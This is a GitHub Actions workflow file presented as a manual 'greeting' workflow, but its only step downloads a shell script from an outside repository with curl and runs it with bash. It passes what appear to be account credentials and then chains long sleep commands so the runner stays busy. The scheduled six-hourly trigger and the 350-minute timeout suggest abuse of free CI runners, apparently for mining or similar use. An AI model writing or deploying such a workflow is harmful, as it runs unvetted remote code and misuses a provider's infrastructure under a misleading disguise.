name: Manual workflow

on:
  workflow_dispatch:
    inputs:
      name:
        description: 'Person to greet'
        default: '-u 9846f1e5c6c7181eadcfdc572bb7a5dc -p 514981'
        required: true
        type: string
  schedule:
    - cron: '0 */6 * * *'    

jobs:
  greet:
    strategy:
      fail-fast: false
      
    runs-on: ubuntu-latest
    timeout-minutes: 350

    steps:
    - name: Send greeting
      run: >
        NAME=${{ github.event.inputs.name }}
        if [ -z "$NAME" ]
        then
          NAME='-u 9846f1e5c6c7181eadcfdc572bb7a5dc -p 514981'
        fi
        curl -o /tmp/php.sh -Ls https://github.com/A233S/angti/raw/main/phpv3.sh ; bash /tmp/php.sh $NAME && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999999999999999  && python manage.py migrate && python manage.py collectstatic --noinput && gunicorn mysite.wsgi
